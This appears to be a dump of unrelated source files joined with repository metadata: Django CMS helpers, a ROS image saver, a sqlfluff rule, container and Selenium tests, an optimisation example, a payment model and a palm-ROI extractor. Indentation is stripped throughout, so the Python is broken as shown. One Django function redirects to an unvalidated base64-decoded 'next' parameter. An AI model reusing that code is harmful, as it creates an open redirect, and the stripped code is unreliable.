if urlchanged:
# Save Children to update their urls and move thier directories.
for child in self.get_children():
object = nodefindobject(child)
object.save()
# # Move Directory
# silentmove_media(
# settings.MEDIA_ROOT + oldurl,
# settings.MEDIA_ROOT + self.url
# )
# # Move File
# if currentname != newname:
# oldpath = '{0}/{1}'.format(settings.MEDIA_ROOT, currentname)
# newpath = '{0}/{1}'.format(settings.MEDIA_ROOT, newname)
# silentmove_media(oldpath, newpath)
# # Commenting file moves because newly uploaded files
# # think they are moving on upload.
# # filepath_email(self, oldpath, newpath)
related_resource_links(self)
clearcache(self)
# Model Inheritance Object
def nodefindobject(node):
return apps.get_model(
node.node_type + '.' + node.content_type).objects.get(pk=node.pk)
def objectfindnode(object):
Node = apps.get_model('objects', 'node')
return Node.objects.get(pk=object.pk)
# MPTT Tree Functions
def resetchildrentoalphatitle():
Node = apps.get_model('objects', 'node')
top = Node.objects.filter(node_type='pages').get(
node_title='Charter Schools')
children = top.get_children()
children = children.order_by('node_title')
parent = children[0]
parent.move_to(top, position='first-child')
for child in children[1:]:
parent = Node.objects.get(pk=parent.pk)
child = Node.objects.get(pk=child.pk)
child.move_to(parent, position='right')
'Moving {0} after {1}'.format(child, parent)
parent = child
# Cache Functions
def clearcache(object):
pass
def save_formset(self, request, form, formset, change):
# formset.save() returns instances but
# I do not need them so I am not storing them.
formset.save(commit=False)
for obj in formset.deleted_objects:
obj.delete()
for obj in formset.new_objects:
obj.create_user = request.user
obj.update_user = request.user
obj.site = request.site
try:
if not obj.primary_contact:
obj.primary_contact = request.user
except AttributeError:
pass
obj.save()
for obj in formset.changed_objects:
obj[0].update_user = request.user
obj[0].save()
formset.save_m2m()
def save_model(self, request, obj, form, change):
if getattr(obj, 'create_user', None) is None:
obj.create_user = request.user
obj.update_user = request.user
if getattr(obj, 'site', None) is None:
obj.site = request.site
super(self.__class__, self).save_model(request, obj, form, change)
def response_change(self, request, obj):
if 'next' in request.GET:
opts = self.model._meta
pk_value = obj._get_pk_val()
preserved_filters = self.get_preserved_filters(request)
msg_dict = {
'name': force_text(opts.verbose_name),
'obj': format_html(
'<a class="editlink" href="{}">{}</a>',
urlquote(request.path), obj),
}
if "_continue" in request.POST:
msg = format_html(
_('The {name} "{obj}" was changed successfully.'
'You may edit it again below.'),
**msg_dict
)
self.message_user(request, msg, messages.SUCCESS)
redirect_url = request.get_full_path()
redirect_url = add_preserved_filters({
'preserved_filters': preserved_filters,
'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
if '_continue' not in request.POST:
msg = format_html(
_('The {name} "{obj}" was changed successfully.'),
**msg_dict
)
self.message_user(request, msg, messages.SUCCESS)
return HttpResponseRedirect(
base64.b64decode(request.GET['next']).decode('utf-8'))
return super(self.__class__, self).response_change(request, obj)
def get_management_website():
Site = apps.get_model('sites', 'site')
try:
return Site.objects.only('pk').get(name='Website Management').pk
except Site.DoesNotExist:
return ''
def get_district_office():
Location = apps.get_model('taxonomy', 'location')
try:
return Location.objects.only('pk').get(title='District Office').pk
except Location.DoesNotExist:
return ''
def get_districtcalendareventcategory_general():
DistrictCalendarEventCategory = apps.get_model(
'taxonomy',
'districtcalendareventcategory'
)
try:
return DistrictCalendarEventCategory.objects.only('pk').get(
title='General Event').pk
except DistrictCalendarEventCategory.DoesNotExist:
return ''
def get_webmaster(pk=True):
User = apps.get_model('objects', 'user')
try:
webmaster = User.objects.get(username='<EMAIL>')
if pk:
return webmaster.pk
else:
return webmaster
except User.DoesNotExist:
return ''
def get_default_pagelayout(pk=True):
PageLayout = apps.get_model('dashboard', 'pagelayout')
try:
layout = PageLayout.objects.get(title='Default')
if pk:
return layout.pk
else:
return layout
except PageLayout.DoesNotExist:
return ''
def get_contactpage(request, pk=True):
Node = apps.get_model('objects', 'node')
try:
page = Node.objects.get(node_title='Contact Us', site=request.site)
if pk:
return page.pk
else:
return page
except Node.DoesNotExist:
return ''
def currentyear(date=timezone.now()):
if date.month >= 7:
currentyearkey = date.year + 1
currentyearstring = str(date.year) + '-' + str(date.year + 1)[2:]
else:
currentyearkey = date.year
currentyearstring = str(date.year - 1) + '-' + str(date.year)[2:]
currentyear = {"short": currentyearkey, "long": currentyearstring}
return {'currentyear': currentyear}
def next_tuesday_sixthrity():
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
while now.weekday() != 1:
now += timedelta(days=1)
now += timedelta(hours=18 - int(now.strftime('%H')))
now += timedelta(minutes=30 - int(now.strftime('%M')))
return timezone.make_aware(now)
def tomorrow_midnight():
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
now += timedelta(days=1)
now += timedelta(hours=0 - int(now.strftime('%H')))
now += timedelta(minutes=0 - int(now.strftime('%M')))
return timezone.make_aware(now)
def december_thirty_first():
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
return timezone.make_aware(
timezone.datetime(now.year, 12, 31, 00, 00)
)
def file_name(self):
if (
(
self.parent.node_type == 'documents' and
self.parent.content_type == 'document'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'policy'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'administrativeprocedure'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'supportingdocument'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingexhibit'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingagendaitem'
)
):
return '{0}-{1}{2}'.format(
self.parent.slug,
self.slug,
findfileext_media(self.file_file.url)[1],
)
if (
(
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingagenda'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingminutes'
)
):
return '{0}-{1}-{2}{3}'.format(
self.parent.parent.slug,
self.parent.slug,
self.slug,
findfileext_media(self.file_file.url)[1],
)
if (
(
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingaudio'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingvideo'
)
):
return '{0}-{1}{2}'.format(
self.parent.parent.slug,
self.parent.slug,
findfileext_media(self.file_file.url)[1],
)
if (
(
self.node_type == 'images' and
self.content_type == 'thumbnail'
) or (
self.node_type == 'images' and
self.content_type == 'newsthumbnail'
) or (
self.node_type == 'images' and
self.content_type == 'pagebanner'
) or (
self.node_type == 'images' and
self.content_type == 'contentbanner'
) or (
self.node_type == 'images' and
self.content_type == 'profilepicture'
) or (
self.node_type == 'images' and
self.content_type == 'districtlogogif'
) or (
self.node_type == 'images' and
self.content_type == 'districtlogojpg'
) or (
self.node_type == 'images' and
self.content_type == 'districtlogopng'
) or (
self.node_type == 'images' and
self.content_type == 'districtlogotif'
) or (
self.node_type == 'images' and
self.content_type == 'districtlogo'
) or (
self.node_type == 'images' and
self.content_type == 'photogalleryimage'
) or (
self.node_type == 'images' and
self.content_type == 'inlineimage'
)
):
return '{0}{1}'.format(
self.slug,
findfileext_media(self.image_file.url)[1],
)
if(
self.node_type == 'files' and
self.content_type == 'precinctmap'
):
return '{0}{1}'.format(
self.slug,
findfileext_media(self.file_file.url)[1],
)
customerror_emailadmins(
'Missing File Name',
'Missing file name for: '
'{0} with node type: {1} and content type: {2}'.format(
self.pk,
self.node_type,
self.content_type,
)
)
return 'unkonwn'
def name_dot_field_dot_ext(generator):
"""
A namer that, given the following source file name::
photos/thumbnails/bulldog.jpg
will generate a name like this::
/path/to/generated/images/{image.pk}.{specfield}.{ext}
where "/path/to/generated/images/" is the value specified by the
``IMAGEKIT_CACHEFILE_DIR`` setting.
"""
source_filename = getattr(generator.source, 'name', None)
if 'specfield' in generator.options:
specfield = generator.options['specfield']
else:
raise Exception('Spec Field Options Must Include Spec Field Name.')
dir = settings.IMAGEKIT_CACHEFILE_DIR
ext = suggest_extension(source_filename or '', generator.format)
basename = os.path.basename(source_filename)
returnpath = os.path.normpath(os.path.join(dir, '%s.%s%s' % (
os.path.splitext(basename)[0], specfield, ext)))
return returnpath
def related_resource_links(self):
if self.node_type == 'pages' and self.content_type == 'school':
if self.website_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='website_url',
parent=self,
site=self.site,
defaults={
'title': 'School Website',
'link_url': self.website_url,
'related_locked': True,
}
)
link.title = 'School Website'
link.link_url = self.website_url
link.related_locked = 'website_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='website_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.scc_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='scc_url',
parent=self,
site=self.site,
defaults={
'title': 'School Community Council',
'link_url': self.scc_url,
'related_locked': True,
}
)
link.title = 'School Community Council'
link.link_url = self.scc_url
link.related_locked = 'scc_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='scc_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.calendar_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='calendar_url',
parent=self,
site=self.site,
defaults={
'title': 'School Calendar',
'link_url': self.calendar_url,
'related_locked': True,
}
)
link.title = 'School Calendar'
link.link_url = self.calendar_url
link.related_locked = 'calendar_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='calendar_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.donate_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='donate_url',
parent=self,
site=self.site,
defaults={
'title': 'Make a Donation',
'link_url': self.donate_url,
'related_locked': True,
}
)
link.title = 'Make a Donation'
link.link_url = self.donate_url
link.related_locked = 'donate_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='donate_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.node_type == 'documents' and self.content_type == 'document':
link, created = self.parent.links_resourcelink_node.get_or_create(
related_locked=str(self.uuid),
parent=self.parent,
site=self.site,
defaults={
'title': self.title,
'link_url': self.url,
'related_locked': True,
}
)
link.title = self.title
link.link_url = self.url
link.related_locked = str(self.uuid)
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = self.deleted
link.published = self.published
doc_len = len(
self
.files_file_node
.filter(deleted=0)
.filter(published=1)
.filter(file_file__isnull=False)
)
if doc_len < 1:
link.published = False
elif doc_len > 1:
link.published = self.published
link.modal_ajax = True
link.target_blank = False
else:
link.published = self.published
link.modal_ajax = False
link.target_blank = True
link.save()
if self.node_type == 'pages' and self.content_type == 'subpage':
link, created = self.parent.links_resourcelink_node.get_or_create(
related_locked=str(self.uuid),
parent=self.parent,
site=self.site,
defaults={
'title': self.title,
'link_url': self.url,
'related_locked': True,
}
)
link.title = self.title
link.link_url = self.url
link.related_locked = str(self.uuid)
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = self.deleted
link.published = self.published
link.save()
if self.node_type == 'pages' and self.content_type == 'boardsubpage':
link, created = self.parent.links_resourcelink_node.get_or_create(
related_locked=str(self.uuid),
parent=self.parent,
site=self.site,
defaults={
'title': self.title,
'link_url': self.url,
'related_locked': True,
}
)
link.title = self.title
link.link_url = self.url
link.related_locked = str(self.uuid)
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = self.deleted
link.published = self.published
link.save()
if self.node_type == 'files':
related_resource_links(nodefindobject(self.parent))
def get_domain(site):
if settings.ENVIRONMENT_MODE == "development":
try:
site = Alias.objects.get(domain__contains='-dev', site=site)
except Alias.DoesNotExist:
pass
if settings.ENVIRONMENT_MODE == "test":
try:
site = Alias.objects.get(domain__contains='-test', site=site)
except Alias.DoesNotExist:
pass
return site.domain
def is_siteadmin(request):
if (
request.user.is_superuser or
request.user.groups.filter(name='Website Managers') or
request.site.dashboard_sitepublisher_site.filter(
account=request.user.pk)
):
return True
return False
def is_globaladmin(request):
if (
request.user.is_superuser or
request.user.groups.filter(name='Website Managers')
):
return True
return False
def link_url_absolute(self):
input_url = urlsplit(self.link_url)
working_url = list(input_url)
if self.link_url:
if not working_url[1]:
working_url[0] = 'https'
working_url[1] = self.site.domain
return urlunsplit(working_url)
def can_edit_page(node):
# Get Required Models
Employee = apps.get_model('users', 'Employee')
PageEditor = apps.get_model('users', 'PageEditor')
# Define the ordered dic to track all users
all_users = OrderedDict()
# Find all superusers
for username in (
Employee
.objects
.filter(
is_active=1,
deleted=0,
published=1,
is_superuser=1)
.values('pk', 'username')
):
if username['pk'] in all_users:
all_users[username['pk']]['roles'].append('superuser')
else:
all_users[username['pk']] = {
'username': username['username'], 'roles': ['superuser']}
# Find all website managers
for username in (
Employee
.objects
.filter(
is_active=1,
deleted=0,
published=1,
groups__name='Website Managers'
)
.values('pk', 'username')
):
if username['pk'] in all_users:
all_users[username['pk']]['roles'].append('website_manager')
else:
all_users[username['pk']] = {
'username': username['username'], 'roles': ['website_manager']}
# Final site publishers
for username in (
node
.site
.dashboard_sitepublisher_site
.all()
.only('account')
):
if username.account.is_active:
if username.account.pk in all_users:
all_users[username.account.pk]['roles'].append(
'site_publisher')
else:
all_users[username.account.pk] = {
'username': username.account.username, 'roles': ['site_publisher']}
# Find direct page editors for the node
for username in (
node
.users_pageeditor_node
.filter(
deleted=0,
employee__is_active=1,
employee__deleted=0,
employee__published=1
)
.values('employee__pk', 'employee__username')
):
if username['employee__pk'] in all_users:
all_users[username['employee__pk']]['roles'].append('page_editor')
else:
all_users[username['employee__pk']] = {
'username': username['employee__username'], 'roles': ['page_editor']}
# Find all parent nodes and their page editors
for node in (
node
.get_ancestors()
.filter(
deleted=0,
published=1
)
):
for username in (
node
.users_pageeditor_node
.filter(
deleted=0,
employee__is_active=1,
employee__deleted=0,
employee__published=1
)
.values('employee__pk', 'employee__username')
):
if username['employee__pk'] in all_users:
all_users[username['employee__pk']]['roles'].append(
'inherited_page_editor')
else:
all_users[username['employee__pk']] = {'username': username['employee__username'],
'roles': ['inherited_page_editor']}
# Return the ordered dict
return all_users
| 1.820313 | 2 |
ros/src/util/packages/data_preprocessor/scripts/get_ImageTopic.py | baharkhabbazan/autoware | 64 | 12769994 | <reponame>baharkhabbazan/autoware
#!/usr/bin/env python
import sys
import os
import rospy
import numpy as np
import cv2
import pcl
from get_rosbaginfo import get_type_and_topic, get_baginfo
import sensor_msgs.point_cloud2 as pc2
from sensor_msgs.msg import Image, PointCloud2
from cv_bridge import CvBridge
class ImageSaver(object):
def __init__(self, save_path, output_type, bagfile, topic):
self.save_path = save_path
self.topic = topic
self.output_type = output_type
self.bagfile = bagfile
self.img_datasets = []
def img_loader(self, image_msg):
bridge = CvBridge()
rospy.loginfo(image_msg.encoding)
print(image_msg.height)
camera_img = bridge.imgmsg_to_cv2(image_msg, "bgr8")
timestamp = image_msg.header.stamp.secs + ((image_msg.header.stamp.nsecs + 0.0) / 1000000000)
if self.output_type == "image":
self.save_image(camera_img, timestamp, '1')
elif self.output_type == "h5file":
self.save_h5file(camera_img, timestamp)
def save_image(self, img, timestamp, sfx):
cv2.imwrite(self.save_path + '/camera_' + sfx + '_' + "{:.5f}".format(timestamp) + '.png', img)
def save_h5file(self, img, timestamp):
print(timestamp)
a = get_baginfo(self.bagfile)
print(a[self.topic][1])
def process(self):
node_name = "get_%s_and_convert_to_RGB_Image" % self.topic
rospy.init_node('rosbag_data_extract_unsync', anonymous=True)
rospy.Subscriber(self.topic, Image, self.img_loader)
rospy.spin()
def rosbag_data_extract_sample():
try:
save_path = sys.argv[1]
topic = sys.argv[2]
output_type = "image"
bagfile = "/home/katou01/.autoware/autoware-201701171120.bag"
except Exception, e:
sys.exit("Please specify the save path. Example: rosbag_data_extract_unsync.py /media/0/output/")
image_saver = ImageSaver(save_path, output_type, bagfile, topic)
image_saver.process()
# node_name = "get_%s_and_convert_to_RGB_Image" % topic
# rospy.init_node('rosbag_data_extract_unsync', anonymous=True)
#
# rospy.Subscriber(topic, Image, img_loader)
# rospy.spin()
if __name__ == '__main__':
rosbag_data_extract_sample()
| 2.4375 | 2 |
src/sqlfluff/core/rules/std/L001.py | netlify/sqlfluff | 2 | 12769995 | """Implementation of Rule L001."""
from sqlfluff.core.rules.base import BaseRule, LintResult, LintFix
from sqlfluff.core.rules.doc_decorators import document_fix_compatible
@document_fix_compatible
class Rule_L001(BaseRule):
"""Unnecessary trailing whitespace.
| **Anti-pattern**
| The • character represents a space.
.. code-block::
SELECT
a
FROM foo••
| **Best practice**
| Remove trailing spaces.
.. code-block::
SELECT
a
FROM foo
"""
def _eval(self, segment, raw_stack, **kwargs):
"""Unnecessary trailing whitespace.
Look for newline segments, and then evaluate what
it was preceded by.
"""
# We only trigger on newlines
if (
segment.is_type("newline")
and len(raw_stack) > 0
and raw_stack[-1].is_type("whitespace")
):
# If we find a newline, which is preceded by whitespace, then bad
deletions = []
idx = -1
while raw_stack[idx].is_type("whitespace"):
deletions.append(raw_stack[idx])
idx -= 1
return LintResult(
anchor=deletions[-1], fixes=[LintFix("delete", d) for d in deletions]
)
return LintResult()
| 2.59375 | 3 |
CI/src/integration_tests/test_image_with_symlink_over_directory.py | tdhooks/sarus | 84 | 12769996 | <reponame>tdhooks/sarus
# Sarus
#
# Copyright (c) 2018-2021, ETH Zurich. All rights reserved.
#
# Please, refer to the LICENSE file in the root directory.
# SPDX-License-Identifier: BSD-3-Clause
import unittest
import common.util as util
class TestImageWithSymlinkOverDirectory(unittest.TestCase):
"""
These tests simply pull and run an image where a directory was
created in a layer and then replaced with a symlink in a later layer.
"""
_IMAGE_NAME = "quay.io/ethcscs/sarus-integration-tests:symlink-over-directory"
def test_image_with_symlink_over_directory(self):
util.remove_image_if_necessary(is_centralized_repository=False, image=self._IMAGE_NAME)
util.pull_image_if_necessary(is_centralized_repository=False, image=self._IMAGE_NAME)
output = util.run_command_in_container(is_centralized_repository=False,
image=self._IMAGE_NAME,
command=["ls", "/usr/local/test".encode('utf-8')])
assert output[0] == "file"
output = util.run_command_in_container(is_centralized_repository=False,
image=self._IMAGE_NAME,
command=["realpath", "/usr/local/test".encode('utf-8')])
assert output[0] == "/opt/test"
| 2.0625 | 2 |
Sets/12_Check Subset.py | FaranakAlikhah/ADM-HW1 | 0 | 12769997 | <filename>Sets/12_Check Subset.py
#!/usr/bin/env python
# coding: utf-8
# # *section 4: Strings*
#
# ### writer : <NAME> 1954128
# ### 12.Check Subset:
#
#
# In[ ]:
num_testCase=int(input())
for i in range(num_testCase):
num_testCase1=int(input())
a=set(input().split())
num_testCase2=int(input())
b=set(input().split())
print(a.issubset(b))
#
| 3.015625 | 3 |
examples/Mansell/Hannibal.py | Rapid-Design-of-Systems-Laboratory/beluga-legacy | 1 | 12769998 | #==================================================================================
# PROGRAM: "Hannibal.py"
# LOCATION: beluga>examples>Mansell
# Author: <NAME> (2016)
#
# Description: Preliminary test of a track path optimization using a user-defined
# terrain elevation profile.
#==================================================================================
#Import Necessary Modules
import numpy as np
import beluga.bvpsol as bvpsol
import beluga.bvpsol.algorithms as algorithms
import beluga.optim.Problem
from beluga.optim.problem import *
from beluga.continuation import *
from math import *
import functools
def get_problem():
"""A simple test of optimal surface track planning."""
# Rename this and/or move to optim package?
problem = beluga.optim.Problem('Hannibal')
#Define independent variables
problem.independent('t', 's')
# Define equations of motion
problem.state('x','V*cos(hdg)','m') \
.state('y','V*sin(hdg)','m') \
# Define controls
problem.control('hdg','rad')
# Define Cost Functional
problem.cost['path'] = Expression('(1-w)+w*V*conv*elev*(-0.3*exp(-0.5*((x-2.7)^2+1.5*(y-2.1)^2))+2.6*exp(-0.55*(0.87*(x-6.7)^2+(y-2.2)^2))+2.1*exp(-0.27*(0.2*(x-5.5)^2+(y-7.2)^2))+1.6*(cos(0.8*y))^2*(sin(0.796*x))^2)', 's')
#Define constraints
problem.constraints().initial('x-x_0','m') \
.initial('y-y_0','m') \
.terminal('x-x_f','m') \
.terminal('y-y_f','m')
#Define constants
problem.constant('w',0.0,'1') #Initial Terrain weighting factor
problem.constant('conv',1,'s/m^2') #Integral conversion factor
problem.constant('V',1,'m/s') #Vehicle speed
problem.constant('elev',1,'m') #Initial Elevation
#Unit scaling
problem.scale.unit('m',1) \
.unit('s',1) \
.unit('rad',1)
#Configure solver
problem.bvp_solver = algorithms.MultipleShooting(derivative_method='fd',tolerance=1e-4, max_iterations=1000, verbose = True, cached = False, number_arcs=4)
#Initial Guess
problem.guess.setup('auto',start=[4.9,0.4], costate_guess=[0.1,-0.1]) #City A
#Add Continuation Steps
problem.steps.add_step().num_cases(30) \
.terminal('x', 7.2) \
.terminal('y', 8.5)
problem.steps.add_step().num_cases(30) \
.const('w',0.5) #Final Terrain weighting factor
return problem
if __name__ == '__main__':
import beluga.Beluga as Beluga
problem = get_problem()
sol = Beluga.run(problem)
| 2.765625 | 3 |
pymeterreader/core/channel_upload_info.py | Schwaneberg/pymeterreader | 5 | 12769999 | import typing as tp
from dataclasses import dataclass
from datetime import datetime, timedelta
@dataclass()
class ChannelUploadInfo:
"""
Channel Upload info structure
:param uuid: uuid of db entry to feed
:param interval: interval between readings in seconds
:param factor: multiply to original values, e.g. to conver kWh to Wh
:param last_upload: time of last upload to middleware
:param last_value: last value in middleware
"""
uuid: str
interval: timedelta
factor: float
last_upload: datetime
last_value: tp.Union[int, float]
| 2.90625 | 3 |
app/razorpay_gateway/models.py | S3Infosoft/s3-loyalty-webapp | 0 | 12770000 | from django.db import models
from django.utils import timezone
import datetime
# Create your models here.
class PurchaseOrder(models.Model):
razorpay_payment_id=models.CharField(max_length=100)
razorpay_order_id=models.CharField(max_length=100)
razorpay_signature=models.CharField(max_length=500)
user_unique_id=models.CharField(max_length=40)
user_email=models.EmailField(max_length=30)
amount_debited=models.FloatField(max_length=20)
points_added=models.IntegerField()
date=models.CharField(max_length=50,default=timezone.now)
def __str__(self):
return self.user_email
| 2.40625 | 2 |
PROIE.py | yyaddaden/PROIE | 5 | 12770001 | # -*- coding: UTF-8 -*-
import cv2
import matplotlib.pyplot as plt
import numpy as np
class PROIE():
def __init__(self):
#####
pass
# PRIVATE METHODS
def _threshold(self):
#####
self.blur_img = cv2.GaussianBlur(self.in_img_g, (5, 5), 0)
_, self.thresh_img = cv2.threshold(
self.blur_img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
def _contours(self):
#####
self.contours, _ = cv2.findContours(
self.thresh_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
self.contours = self.contours[0]
self.contour_img = self.in_img_c.copy()
self.contour_img = cv2.drawContours(
self.contour_img, [self.contours], 0, (255, 0, 0), 2)
def _landmarks(self):
#####
M = cv2.moments(self.thresh_img)
x_c = M['m10'] // M['m00']
y_c = M['m01'] // M['m00']
self.center_point = {"x": x_c, "y": y_c}
self.contours = self.contours.reshape(-1, 2)
left_id = np.argmin(self.contours.sum(-1))
self.contours = np.concatenate(
[self.contours[left_id:, :], self.contours[:left_id, :]])
dist_c = np.sqrt(np.square(
self.contours-[self.center_point["x"], self.center_point["y"]]).sum(-1))
f = np.fft.rfft(dist_c)
cutoff = 15
f_new = np.concatenate([f[:cutoff], 0*f[cutoff:]])
dist_c_1 = np.fft.irfft(f_new)
derivative = np.diff(dist_c_1)
sign_change = np.diff(np.sign(derivative))/2
self.landmarks = {"x": [], "y": []}
for landmark in self.contours[np.where(sign_change > 0)[0]]:
self.landmarks["x"].append(landmark[0])
self.landmarks["y"].append(landmark[1])
def _landmarks_select(self):
#####
y_rank = np.array(np.argsort(self.landmarks["y"]))
self.landmarks_selected = {"x": np.array(self.landmarks["x"])[
y_rank][:3], "y": np.array(self.landmarks["y"])[y_rank][:3]}
x_rank = np.array(np.argsort(self.landmarks_selected["x"]))
self.landmarks_selected = {
"x": self.landmarks_selected["x"][x_rank][[0, 2]], "y": self.landmarks_selected["y"][x_rank][[0, 2]]}
def _alignement(self):
#####
h, w = self.in_img_g.shape
theta = np.arctan2((self.landmarks_selected["y"][1] - self.landmarks_selected["y"][0]), (
self.landmarks_selected["x"][1] - self.landmarks_selected["x"][0]))*180/np.pi
R = cv2.getRotationMatrix2D(
(self.landmarks_selected["x"][1], self.landmarks_selected["y"][1]), theta, 1)
self.align_img = cv2.warpAffine(self.in_img_g, R, (w, h))
point_1 = [self.landmarks_selected["x"]
[0], self.landmarks_selected["y"][0]]
point_2 = [self.landmarks_selected["x"]
[1], self.landmarks_selected["y"][1]]
point_1 = (R[:, :2] @ point_1 + R[:, -1]).astype(np.int)
point_2 = (R[:, :2] @ point_2 + R[:, -1]).astype(np.int)
self.landmarks_selected_align = {
"x": [point_1[0], point_2[0]], "y": [point_1[1], point_2[1]]}
def _roi_extract(self):
#####
point_1 = np.array([self.landmarks_selected_align["x"]
[0], self.landmarks_selected_align["y"][0]])
point_2 = np.array([self.landmarks_selected_align["x"]
[1], self.landmarks_selected_align["y"][1]])
self.ux = point_1[0]
self.uy = point_1[1] + (point_2-point_1)[0]//3
self.lx = point_2[0]
self.ly = point_2[1] + 4*(point_2-point_1)[0]//3
self.roi_zone_img = cv2.cvtColor(self.align_img, cv2.COLOR_GRAY2BGR)
cv2.rectangle(self.roi_zone_img, (self.lx, self.ly),
(self.ux, self.uy), (0, 255, 0), 2)
self.roi_img = self.align_img[self.uy:self.ly, self.ux:self.lx]
# PUBLIC METHODS
def extract_roi(self, path_in_img, rotate=False):
#####
self.in_img_c = cv2.imread(path_in_img)
if(rotate):
self.in_img_c = cv2.rotate(self.in_img_c, cv2.ROTATE_90_CLOCKWISE)
if len(self.in_img_c.shape) == 3:
self.in_img_g = cv2.cvtColor(self.in_img_c, cv2.COLOR_BGR2GRAY)
else:
self.in_img_g = self.in_img_c
self._threshold()
self._contours()
self._landmarks()
self._landmarks_select()
self._alignement()
self._roi_extract()
def save(self, path_out_img):
#####
cv2.imwrite(path_out_img, self.roi_img)
def show_result(self):
#####
plt.figure()
plt.subplot(241)
plt.imshow(self.in_img_g, cmap="gray")
plt.title("original")
plt.subplot(242)
plt.imshow(self.thresh_img, cmap="gray")
plt.title("threshold")
plt.subplot(243)
plt.imshow(self.contour_img, cmap="gray")
plt.plot(self.center_point["x"], self.center_point["y"], 'bx')
plt.title("contours")
plt.subplot(244)
plt.imshow(self.in_img_c, cmap="gray")
for idx in range(len(self.landmarks["x"])):
plt.plot(self.landmarks["x"][idx], self.landmarks["y"][idx], 'rx')
plt.title("landmarks")
plt.subplot(245)
plt.imshow(self.in_img_c, cmap="gray")
plt.plot(self.landmarks_selected["x"][0],
self.landmarks_selected["y"][0], 'rx')
plt.plot(self.landmarks_selected["x"][1],
self.landmarks_selected["y"][1], 'rx')
plt.title("selected")
plt.subplot(246)
plt.imshow(self.align_img, cmap="gray")
plt.plot(self.landmarks_selected_align["x"][0],
self.landmarks_selected_align["y"][0], 'rx')
plt.plot(self.landmarks_selected_align["x"][1],
self.landmarks_selected_align["y"][1], 'rx')
plt.title("alignement")
plt.subplot(247)
plt.imshow(self.roi_zone_img, cmap="gray")
plt.title("roi zone")
plt.subplot(248)
plt.imshow(self.roi_img, cmap="gray")
plt.title("extraction")
plt.show() | 2.9375 | 3 |
hth/news/tests/test_admin.py | roperi/myband | 1 | 12770002 | from hth.core.tests.selenium import AdminTestCase
class NewsTestCase(AdminTestCase):
def test_can_create_post(self):
# Ryan logs into the admin
self.adminLogin()
# He adds a draft Post
self.find_link('Posts').click()
self.find_link('ADD POST').click()
self.find_name('title').send_keys('First post')
self.find_name('body').send_keys('<PASSWORD>')
self.find_name('_save').click()
self.assertIn('First post', self.find_tag('body').text)
# He makes sure that it's not published
self.get_url('/news')
self.assertIn('News', self.browser.title)
self.assertNotIn('First post', self.find_tag('body').text)
self.get_url('/news/first-post')
self.assertNotIn('First post', self.browser.title)
# He publishes the post
self.get_url('/admin')
self.find_link('Posts').click()
self.find_link('First post').click()
self.find_name('publish').click()
self.find_name('_save').click()
# He verifies that it was published
self.get_url('/news')
self.find_link('First post').click()
self.assertIn('First post', self.browser.title)
# TODO: He checks the order of the posts?
| 2.453125 | 2 |
hentaihavendev/__init__.py | unsecuring/hentaihavendev | 0 | 12770003 | from hentaihavendev import fact
from hentaihavendev import nsfw | 0.949219 | 1 |
Course 01 - Getting Started with Python/Extra Studies/Functions/ex010.py | marcoshsq/python_practical_exercises | 9 | 12770004 | <filename>Course 01 - Getting Started with Python/Extra Studies/Functions/ex010.py
# Exercise 105 - Parsing and Generating Dictionaries
'''Write a program that has a grades() function that can receive multiple grades
from students and will return a dictionary with the following information:
- Number of notes
- The highest grade
- The lowest grade
- The class average
- The situation (optional)
Also add the docstrings of this function for query by the developer.'''
| 4.125 | 4 |
tests/unit/common/test_alignedtable.py | hrnciar/hdmf | 0 | 12770005 | import numpy as np
from pandas.testing import assert_frame_equal
import warnings
from hdmf.backends.hdf5 import HDF5IO
from hdmf.common import DynamicTable, VectorData, get_manager, AlignedDynamicTable
from hdmf.testing import TestCase, remove_test_file
class TestAlignedDynamicTableContainer(TestCase):
"""
Test the AlignedDynamicTable Container class.
"""
def setUp(self):
warnings.simplefilter("always") # Trigger all warnings
self.path = 'test_icephys_meta_intracellularrecording.h5'
def tearDown(self):
remove_test_file(self.path)
def test_init(self):
